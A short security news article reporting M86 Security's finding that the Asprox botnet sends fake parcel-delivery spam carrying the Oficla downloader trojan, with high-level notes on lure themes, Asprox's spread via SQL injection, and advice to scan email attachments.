14 DAY TRIAL // Researchers from M86 Security claim the Asprox botnet is responsible for sending the fake failed parcel delivery spam, which distributes the Oficla trojan.
Oficla, also known as Sasfis, is a family of downloader-type trojans that is primarily used as a distribution platform for other malware.
Scareware creators are regular customers of such pay-per-install businesses, because their scams are profitable enough to provide the necessary funds.
Oficla was one of the most prevalent email-borne threats during last quarter, with a particular active presence in September when several aggressive campaigns were detected.
It usually arrives in .zip archives attached to spam emails that pose as official communication from known and trusted companies.
One particular theme used in recent months are failed parcel delivery notifications from DHL, Fedex, UPS or the United States Postal Service (USPS).
We even saw localized spam campaigns targeting Spanish speakers, which employed the same DHL failed delivery lure to spread the trojan.
Researchers from M86 Security found clear evidence that an important portion of this spam is sent by the Asprox botnet.
"When we examined a spam template from the Asprox control server we observed that it is still very active and was using a UPS (United Parcel Services) or the USPS (United States Postal Service) theme," they note.
Asprox is a trojan that acts as a botnet client and dates back to 2008. It spreads by infecting legitimate ASP websites via SQL injection with malicious iframes.
There was a sudden spike in Asprox activity back in June when the number of infected domains jumped from around 2,000 to over 10,000 in a three day period.
Users are advised to treat email attachments with increased suspicion, even if they appear to originate from trusted sources. Services like VirusTotal can be used to scan them before opening.